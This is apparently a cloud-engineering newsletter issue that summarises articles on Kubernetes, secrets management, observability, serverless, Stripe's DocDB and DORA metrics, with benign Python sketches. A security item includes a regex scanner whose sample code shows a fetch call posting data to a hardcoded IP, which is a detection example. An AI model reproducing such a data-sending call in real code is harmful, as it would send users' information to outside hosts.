CloudPro #55: Get ready for OpenTofu Beta 1.8.0

Kubernetes Network Observability with IBM SevOne 7.0 and eBPF

Packt

Jul 12, 2024

Welcome to the 55th edition of CloudPro! Today, we’ll talk about:

⭐MasterClass: Tutorials & Guides

🔍Secret Knowledge: Learning Resources

⚡TechWave: Cloud News & Analysis

🛠️HackHub: Best Tools for the Cloud

Cheers,

Shreyans Singh

Editor-in-Chief

⭐MasterClass: Tutorials & Guides

⭐Stateful apps in Kubernetes. From fundamentals to operators

Stateful applications in Kubernetes require additional attention because, unlike stateless applications, they must persist data across instances and restarts. Early Kubernetes primarily supported stateless workloads, but demand for stateful applications such as databases and message queues led to the introduction of PetSets in Kubernetes 1.3, which were renamed StatefulSets in Kubernetes 1.5. StatefulSets provide guarantees about the ordering and uniqueness of pods, making them suitable for running stateful applications.

Running stateful applications in Kubernetes involves using PersistentVolumes (PVs) and PersistentVolumeClaims (PVCs) to manage storage. A PVC requests storage from a StorageClass, which allocates a PV that persists data for the application. Operators further simplify managing stateful applications by automating tasks such as provisioning, scaling, and updating. Operators leverage Kubernetes' Custom Resource Definitions (CRDs) to extend its capabilities, allowing developers to manage complex stateful applications more effectively. Examples include the ClickHouse, Redis, Kafka, PostgreSQL, and MySQL operators, each designed to handle the specific requirements and challenges of these stateful systems.
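As a minimal sketch of how these pieces fit together, the Python below builds a StatefulSet manifest as a plain dict and lists the PVC names Kubernetes would derive from it. The application name `demo-db`, the `standard` StorageClass, and the `postgres:16` image are assumptions chosen for illustration, not details from the article.

```python
import json


def statefulset_manifest(name: str, replicas: int, storage_class: str, size: str) -> dict:
    """Build a StatefulSet manifest in which every pod gets its own PVC."""
    labels = {"app": name}
    return {
        "apiVersion": "apps/v1",
        "kind": "StatefulSet",
        "metadata": {"name": name},
        "spec": {
            "serviceName": name,  # headless Service that gives pods stable DNS names
            "replicas": replicas,
            "selector": {"matchLabels": labels},
            "template": {
                "metadata": {"labels": labels},
                "spec": {
                    "containers": [
                        {
                            "name": name,
                            "image": "postgres:16",  # hypothetical image
                            "volumeMounts": [
                                {"name": "data", "mountPath": "/var/lib/postgresql/data"}
                            ],
                        }
                    ]
                },
            },
            # One PVC per pod is created from this template.
            "volumeClaimTemplates": [
                {
                    "metadata": {"name": "data"},
                    "spec": {
                        "accessModes": ["ReadWriteOnce"],
                        "storageClassName": storage_class,
                        "resources": {"requests": {"storage": size}},
                    },
                }
            ],
        },
    }


def pvc_names(manifest: dict) -> list[str]:
    """PVC names follow the pattern <template>-<statefulset>-<ordinal>."""
    sts = manifest["metadata"]["name"]
    spec = manifest["spec"]
    return [
        f'{tpl["metadata"]["name"]}-{sts}-{i}'
        for tpl in spec["volumeClaimTemplates"]
        for i in range(spec["replicas"])
    ]


if __name__ == "__main__":
    manifest = statefulset_manifest("demo-db", 3, "standard", "10Gi")
    print(json.dumps(manifest, indent=2))
    print(pvc_names(manifest))
```

Because each pod keeps the same ordinal and the same claim across restarts, a rescheduled pod reattaches to the data it wrote earlier.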

⭐Backstage on Kubernetes

In this article, you'll learn how to integrate Backstage with Kubernetes, first by running Backstage outside the cluster against the Kubernetes API, and then by deploying it directly on the cluster with the official Helm chart. You'll also connect Backstage with Argo CD and Prometheus to visualize Argo CD's synchronization status and basic metrics for the app.

To follow along, it's helpful to review the previous article on Backstage, which covers configuring and running Backstage and building a basic template for a Spring Boot app. This article's source code is available in a GitHub repository, containing templates for Kubernetes and detailed instructions on setup. You'll also learn to install necessary components like Prometheus and Argo CD on Kubernetes and configure Backstage with additional plugins for a more integrated cloud-native environment.

⭐Manage secrets in AWS EKS with AWS Secrets Manager securely

Managing secrets such as API keys and database passwords securely is crucial for maintaining the security of applications running in Kubernetes. When using Amazon EKS (Elastic Kubernetes Service) for these applications, AWS Secrets Manager can be employed to handle these secrets safely and efficiently. AWS Secrets Manager integrates with EKS through the AWS Secrets and Configuration Provider (ASCP) for the Kubernetes Secrets Store CSI Driver, offering centralized secret management, fine-grained access control, and seamless integration.

To implement this, you create secrets in AWS Secrets Manager and set up an IAM policy for secret retrieval. IAM Roles for Service Accounts (IRSA) restrict which pods can read the secrets, and a SecretProviderClass custom resource tells the driver which secrets to fetch. This resource lets pods mount the secrets as volumes and can sync them to native Kubernetes secrets. Furthermore, Amazon EKS clusters (version 1.13 and above) support envelope encryption of Kubernetes secrets with AWS Key Management Service (KMS) customer managed keys, which adds real encryption on top of the default Base64 encoding (an encoding, not a security measure). This integration provides robust secret management and encryption, keeping sensitive information secure while simplifying the overall process for Kubernetes applications.
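The SecretProviderClass step can be sketched as follows, again as a Python dict that mirrors the manifest. The resource name, the secret name `prod/db-password`, and the Kubernetes secret name are hypothetical. The sketch also assumes the provider accepts a JSON-formatted `objects` string, since JSON is valid YAML flow syntax.

```python
import json


def secret_provider_class(name: str, secret_name: str, k8s_secret: str, key: str) -> dict:
    """Build a SecretProviderClass for the AWS provider of the Secrets Store CSI Driver."""
    # The provider reads `objects` as a YAML string; a JSON list is used here
    # on the assumption that it parses as YAML flow syntax.
    objects = json.dumps([{"objectName": secret_name, "objectType": "secretsmanager"}])
    return {
        "apiVersion": "secrets-store.csi.x-k8s.io/v1",
        "kind": "SecretProviderClass",
        "metadata": {"name": name},
        "spec": {
            "provider": "aws",
            "parameters": {"objects": objects},
            # Optional: sync the mounted secret into a native Kubernetes Secret.
            "secretObjects": [
                {
                    "secretName": k8s_secret,
                    "type": "Opaque",
                    "data": [{"objectName": secret_name, "key": key}],
                }
            ],
        },
    }


if __name__ == "__main__":
    spc = secret_provider_class(
        name="demo-aws-secrets",         # hypothetical resource name
        secret_name="prod/db-password",  # hypothetical Secrets Manager secret
        k8s_secret="db-credentials",     # hypothetical Kubernetes Secret
        key="password",
    )
    print(json.dumps(spc, indent=2))
```

A pod then references this resource through a CSI volume, and the service account it runs under needs an IRSA role that is allowed to read the named secret.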

⭐Your guide to observability engineering in 2024

In 2024, observability engineering is essential for identifying and addressing unknown issues in complex systems. While traditional monitoring, alerting, and troubleshooting methods can help with known problems, they often fall short in uncovering the root causes of unexpected outages. Observability engineering evolves these processes and tools to effectively query telemetry data, visualize anomalies, and explore solutions for unique incidents in today's cloud environments.

Embracing observability engineering means inferring a system's internal state from its outputs, which gives a more complete view than basic monitoring. It involves collecting, analyzing, and visualizing telemetry data (logs, metrics, and traces) to diagnose issues and ensure system reliability, within a broader strategy that also incorporates continuous profiling and business metrics. An observability engineer's role is multifaceted, requiring expertise in data pipelines, system analysis, and troubleshooting to maintain and optimize complex, distributed systems.

⭐The complete guide to serverless apps

The concept of "serverless" emerged around 2012 but gained significant traction with the launch of AWS Lambda in 2014. While the term implies the absence of servers, it actually refers to a model where developers don't need to manage server infrastructure. Instead, the cloud provider handles server management, allowing developers to focus solely on writing code. This shift has driven the popularity of serverless, as it simplifies the development process and reduces operational overhead.

Serverless applications can be defined in three ways: as SaaS where the user doesn't manage cloud resources, as hosted applications where the infrastructure is managed by the provider, and as software concepts where developers write event-driven functions instead of maintaining long-running servers. This approach allows for efficient, scalable, and cost-effective applications, as the serverless platform handles the underlying complexities of deployment, scaling, and management.
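To make the third definition concrete, here is a minimal sketch of an event-driven function in the style of an AWS Lambda Python handler. The event shape (an HTTP request with `queryStringParameters`) is an assumption for illustration.

```python
import json


def handler(event: dict, context: object) -> dict:
    """Runs once per incoming event; no long-running server process is kept alive."""
    # `queryStringParameters` may be missing or None when no query string is sent.
    params = event.get("queryStringParameters") or {}
    name = params.get("name", "world")
    return {
        "statusCode": 200,
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"message": f"Hello, {name}!"}),
    }


if __name__ == "__main__":
    # Local invocation with a hand-written event; the platform normally supplies both arguments.
    print(handler({"queryStringParameters": {"name": "CloudPro"}}, None))
```

The function holds no state between invocations, which is what lets the platform start and stop copies of it as traffic changes.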

In comparison to Platform-as-a-Service (PaaS), serverless platforms offer greater simplicity and efficiency by eliminating the need for developers to manage server processes. While PaaS allows for long-running services with self-service deployment, serverless platforms are optimized for quick, event-driven functions that can scale rapidly and operate more resource-efficiently. This makes serverless an attractive option for developers seeking to streamline their workflows and build responsive, scalable applications.

🔍Secret Knowledge: Learning Resources

🔍How Stripe’s Document Databases Supported 99.999% Uptime with Zero-Downtime Data Migrations

In 2023, Stripe managed to process $1 trillion in payments while maintaining an impressive 99.999% uptime. This reliability is largely due to their custom-built database infrastructure, called DocDB, which is an extension of MongoDB Community. DocDB handles over five million queries per second and supports Stripe’s diverse and extensive data needs. The infrastructure includes over 2,000 database shards, ensuring efficient and low-latency access to crucial financial data.

Central to DocDB’s performance is the Data Movement Platform, which facilitates seamless, zero-downtime data migrations across database shards. Originally designed to overcome scaling limits, this platform now enables Stripe to merge, upgrade, and reallocate database shards efficiently. The process includes bulk data import, asynchronous replication, correctness checks, and a sophisticated traffic switch mechanism that ensures minimal disruption during migrations. This robust system allows Stripe to maintain high availability and performance, crucial for their extensive and critical operations.
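The four phases named above can be illustrated with a toy model. This is not Stripe's implementation: in-memory dicts stand in for database shards, and the list of writes that arrive during the copy is a hypothetical input.

```python
def migrate(source: dict, target: dict, writes_during_copy: list[tuple[str, str]]) -> str:
    """Toy zero-downtime migration; returns the name of the shard that serves traffic afterwards."""
    # 1. Bulk import: copy a point-in-time snapshot of the source.
    snapshot = dict(source)
    target.update(snapshot)

    # Clients keep writing to the source while the copy is running.
    for key, value in writes_during_copy:
        source[key] = value

    # 2. Asynchronous replication: replay those writes on the target, in order.
    for key, value in writes_during_copy:
        target[key] = value

    # 3. Correctness check: both sides must hold identical data before the switch.
    if source != target:
        raise RuntimeError("target diverged from source; aborting traffic switch")

    # 4. Traffic switch: route reads and writes to the target from now on.
    return "target"


if __name__ == "__main__":
    src = {"acct_1": "100"}
    dst: dict = {}
    serving = migrate(src, dst, [("acct_2", "50"), ("acct_1", "120")])
    print(serving, dst)
```

The ordering matters: traffic moves only after replication has caught up and the check has passed, so clients never read from a shard that is missing writes.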

🔍Anomaly Alerting in Prometheus

This post focuses on anomaly alerting, which detects issues such as performance regressions without predefined thresholds. Using Prometheus with Istio, it sets up a generic anomaly detection system for response times that applies to all services running on a mesh.

The first step establishes a baseline by using a recording rule to reduce high-cardinality metrics to a simple time series, which makes it practical to track key metrics such as the 95th percentile response time. Next comes a prediction built from historical data, averaging the last three weeks so that outliers do not skew it. Comparing this prediction with current data yields a Z-score that identifies significant deviations from the norm. An alert then fires when response times stay more than three standard deviations above the prediction for five minutes, signaling potential anomalies without generating excessive false positives.
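The Z-score logic can be sketched outside Prometheus in a few lines of Python. This is an illustration of the arithmetic only, not the post's recording rules. The history values and the one-sample-per-minute window are assumptions.

```python
from statistics import mean, pstdev


def z_score(current: float, history: list[float]) -> float:
    """Number of standard deviations by which `current` differs from the historical mean."""
    spread = pstdev(history)
    if spread == 0:
        return 0.0  # a flat history gives no scale to measure a deviation against
    return (current - mean(history)) / spread


def should_alert(window: list[float], history: list[float], threshold: float = 3.0) -> bool:
    """Fire only if every sample in the window is above the threshold.

    With one sample per minute, a five-element window models "for five minutes".
    """
    return bool(window) and all(z_score(s, history) > threshold for s in window)


if __name__ == "__main__":
    # Hypothetical p95 response times (ms) observed at the same time of day in past weeks.
    history = [100.0, 110.0, 90.0, 105.0, 95.0]
    print(round(z_score(130.0, history), 2))
    print(should_alert([130.0, 135.0, 128.0, 140.0, 131.0], history))
    print(should_alert([130.0, 115.0, 128.0, 140.0, 131.0], history))
```

Requiring the whole window to exceed the threshold is what keeps a single slow request from paging anyone.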

🔍The ROI of improving and investing in DORA

DORA Metrics provide a comprehensive view of your software team's performance, helping identify areas for improvement and measure the return on investment (ROI) of these enhancements. The basic ROI calculation for improving DORA Metrics revolves around reducing the time engineers spend on non-value-add tasks. For example, if developers waste less time on administrative tasks, the cost savings can be significant. This simple approach shows how reducing wasted time can justify the investment in tools and practices to improve DORA Metrics.

A more sophisticated ROI model links improvements in DORA Metrics directly to revenue. By calculating the revenue generated per effective developer hour, you can demonstrate that eliminating waste increases the time developers spend on productive tasks, thus boosting revenue. For instance, if improving DORA Metrics can reduce wasted time by 10%, each developer can support more revenue, potentially converting to millions in additional ARR. This approach provides a clear business case, highlighting the substantial financial benefits of investing in DORA Metrics, beyond mere cost savings.
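Both ROI models reduce to simple arithmetic, sketched below. All figures (team size, hourly cost, ARR, and the share of time wasted before and after) are hypothetical inputs, and the revenue model assumes that revenue per effective developer hour stays constant.

```python
def cost_savings(developers: int, cost_per_hour: float, hours_per_year: float,
                 waste_before: float, waste_after: float) -> float:
    """Basic model: yearly cost of the developer hours no longer wasted."""
    if not 0 <= waste_after <= waste_before < 1:
        raise ValueError("expected 0 <= waste_after <= waste_before < 1")
    return developers * cost_per_hour * hours_per_year * (waste_before - waste_after)


def added_revenue(arr: float, waste_before: float, waste_after: float) -> float:
    """Revenue model: extra ARR if revenue per effective hour stays constant."""
    if not 0 <= waste_after <= waste_before < 1:
        raise ValueError("expected 0 <= waste_after <= waste_before < 1")
    # Effective hours scale by (1 - waste_after) / (1 - waste_before).
    return arr * ((1 - waste_after) / (1 - waste_before) - 1)


if __name__ == "__main__":
    # Hypothetical team: 50 developers, $75/hour, 2,000 hours/year,
    # wasted time falling from 30% to 20% of total time.
    print(round(cost_savings(50, 75.0, 2000, 0.30, 0.20)))
    print(round(added_revenue(20_000_000, 0.30, 0.20)))
```

With these inputs the basic model yields about $750,000 in yearly savings, while the revenue model yields roughly $2.86 million in additional ARR, which shows why the second framing makes the stronger business case.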

🔍AWS Managed KMS Keys and their Key Policies

AWS Managed KMS Keys are encryption keys managed by AWS but used within your own AWS account, often applied as default keys for various services. These keys have their own key policies and can affect security and application design, but visibility into their usage and management is often limited. To address this, the authors created a tool that scans AWS services to identify AWS Managed KMS Keys and their associated key policies, and they publish the resulting list on GitHub. The tool helps track which services use these keys and the security implications of their policies.
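One way such a scan could identify these keys is by alias, since AWS reserves the `alias/aws/` prefix for AWS managed keys. The sketch below is not the tool described here: it makes no AWS calls and works on entries shaped like the output of the KMS `ListAliases` API, with made-up key IDs.

```python
AWS_ALIAS_PREFIX = "alias/aws/"


def aws_managed_services(aliases: list[dict]) -> dict[str, str]:
    """Map service name to key ID for aliases that point at AWS managed keys."""
    result: dict[str, str] = {}
    for alias in aliases:
        name = alias.get("AliasName", "")
        key_id = alias.get("TargetKeyId")
        # A reserved alias can exist before its key does, so require a TargetKeyId.
        if name.startswith(AWS_ALIAS_PREFIX) and key_id:
            result[name[len(AWS_ALIAS_PREFIX):]] = key_id
    return result


if __name__ == "__main__":
    # Hypothetical entries shaped like ListAliases output; key IDs are made up.
    sample = [
        {"AliasName": "alias/aws/s3", "TargetKeyId": "1111-aaaa"},
        {"AliasName": "alias/aws/rds", "TargetKeyId": "2222-bbbb"},
        {"AliasName": "alias/aws/ebs"},  # alias reserved, key not created yet
        {"AliasName": "alias/my-app-key", "TargetKeyId": "3333-cccc"},  # customer managed
    ]
    print(aws_managed_services(sample))
```

Each key ID found this way could then be used to fetch the key policy for review.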

AWS Managed KMS Keys offer convenience, as AWS handles their creation, management, and rotation, and there’s no extra cost for using them. However, they might not be suitable for all scenarios, particularly those requiring detailed key management or cross-account access. The tool also highlights that while AWS provides these keys, there is often no central documentation on their availability or usage, making it hard to get a full picture of their impact. By offering a detailed report of AWS Managed KMS Keys and their policies, the authors aim to improve visibility and help organizations make informed decisions about when and how to use these keys.

🔍Attack Paths Into VMs in the Cloud

In the cloud, virtual machines (VMs) are common and crucial components of many IT infrastructures. However, their frequent use makes them attractive targets for attackers. This post reviews how attackers might exploit VMs and offers strategies for organizations to secure their environments. It examines attack methods across three major cloud platforms—AWS, Azure, and Google Cloud Platform—focusing on how attackers might exploit vulnerabilities or misuse features like startup scripts and SSH key management.

Attackers can exploit various features and configurations of VMs to gain unauthorized access or escalate their privileges. For example, they might exploit critical vulnerabilities in exposed VMs, manipulate startup scripts to execute malicious code, or misuse features like SSH key management to gain access to VMs. The post details these attack methods, highlighting the conditions that must be met for these attacks to succeed and offering mitigation strategies to protect against them. Effective management of permissions and careful configuration are essential to secure VMs from potential threats.

⚡TechWave: Cloud News & Analysis

⚡Introducing: Kubernetes Network Observability with IBM SevOne 7.0 and eBPF

IBM SevOne 7.0 introduces advanced network observability for Kubernetes environments. By combining IBM SevOne 7.0 with Red Hat NetObserv, the solution provides detailed visibility into network traffic within Kubernetes clusters.

It uses eBPF technology to offer deep insights into network performance, including data flows between pods, nodes, and namespaces, as well as external interactions. This tool enriches network data with valuable context like geographic locations and autonomous systems, bridging the gap between NetOps and DevOps teams and ensuring they have the information needed to maintain a reliable and performant application experience.

⚡SUSE Acquires StackState for Cloud-Native Observability

SUSE has announced that it is acquiring StackState to enhance its Rancher platform for managing Kubernetes clusters. This acquisition will integrate StackState’s advanced observability features into the Rancher Prime version, aimed at enterprise IT teams. The plan includes expanding StackState’s capabilities across SUSE’s portfolio to improve cost management, issue resolution, and optimization for cloud-native applications and IoT environments.

StackState offers a unique approach to observability by providing a comprehensive view of all components in a cloud environment, from applications and services to infrastructure. Its ability to automatically map dependencies and integrate with various cloud platforms and monitoring tools sets it apart from other observability solutions. By embedding StackState into Rancher Prime, SUSE aims to give IT teams a powerful tool for monitoring and managing complex cloud-native applications, ensuring better performance and reliability across their technology stacks.

⚡Get ready for OpenTofu Beta 1.8.0

OpenTofu Beta 1.8.0 is now available for testing, and the team behind it has been refining the release based on user feedback from the alpha version. This new beta version introduces features like provider mocking in tests, which allows users to simulate resource and data source interactions without needing an actual cloud setup. It also supports resource overrides and early variable evaluation for more flexible configurations.

You can download the beta release for various platforms from GitHub, but remember it’s not intended for production use. The update also includes bug fixes, improved error messages, and enhanced compatibility with Terraform modules. The OpenTofu team invites users to test the release and provide feedback through GitHub or Slack.

⚡Malicious VSCode extensions with millions of installs discovered

Researchers recently uncovered serious security issues in the Visual Studio Code (VSCode) Marketplace. By creating a fake version of the popular 'Dracula Official' theme, they managed to trick over 100 organizations into installing their malicious extension. This fake extension collected sensitive system information from users without triggering traditional security defenses.

Their investigation revealed that the VSCode Marketplace is filled with risky extensions, including some with known malicious code and others that could potentially harm users. They found thousands of extensions with millions of installs, many of which contained dangerous features like hardcoded IP addresses or unknown executables. The researchers have reported these threats to Microsoft but noted that many malicious extensions remain on the marketplace. They also plan to release a new tool to help developers identify and avoid these security risks.
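One of the risk signals mentioned above, hardcoded IP addresses, is simple to check for. The sketch below is not the researchers' tool, only a minimal regex scan over source text. The ignore list and the sample snippet are assumptions, and a match is a prompt for manual review rather than proof of malice.

```python
import re

# Matches dotted IPv4 addresses whose octets are in the range 0-255.
IPV4 = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)

# Addresses that are common in benign code (assumed ignore list).
IGNORED = {"127.0.0.1", "0.0.0.0"}


def hardcoded_ips(source: str) -> list[str]:
    """Return the distinct non-ignored IPv4 addresses found in `source`, sorted."""
    return sorted({ip for ip in IPV4.findall(source) if ip not in IGNORED})


if __name__ == "__main__":
    # Hypothetical extension code; 203.0.113.7 is a documentation-range address.
    snippet = '''
    const version = "1.2.3";
    const local = "127.0.0.1";
    fetch("http://203.0.113.7/collect", { method: "POST", body: info });
    '''
    print(hardcoded_ips(snippet))
```

Four-part version strings would also match, so a real scanner would need more context before flagging an extension.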

⚡Java observability with OpenTelemetry, Grafana Cloud, and Digma.ai

In the past, developers mainly used simple logs for debugging, while metrics and traces were handled by IT teams. This meant that developers often only engaged with observability tools reactively, when problems occurred. Today, new tools and practices are making it easier for developers to integrate observability into their daily work.

For instance, tools like OpenTelemetry and Grafana Cloud now enable developers to collect and visualize performance data from their applications more easily. Digma.ai takes this a step further by integrating observability directly into the IDE, allowing developers to see and act on performance data in real time. This approach shortens the feedback loop between introducing a bug and discovering it, making it easier for developers to address issues quickly and improve their code continuously.

🛠️HackHub: Best Tools for the Cloud

🛠️orbitinghail/sqlsync

SQLSync is a tool that lets users collaborate on web apps offline using a local SQLite database that syncs data across devices and users.

🛠️szymon-szym/lambda_helpers_metrics

A library that simplifies sending custom metrics to CloudWatch using EMF (Embedded Metric Format).

🛠️mostlycloudysky/cloudysetup

A Python tool that uses Amazon Bedrock’s AI to manage AWS resources by generating, applying, and improving AWS resource configurations with the Cloud Control API.

🛠️hcavarsan/kftray

KFtray is a cross-platform system tray app that simplifies managing multiple `kubectl port-forward` commands for Kubernetes users, supporting both TCP and UDP connections.

🛠️keycloak/keycloak

Keycloak is an open-source identity and access management tool that provides authentication, user management, and fine-grained authorization for applications with minimal setup.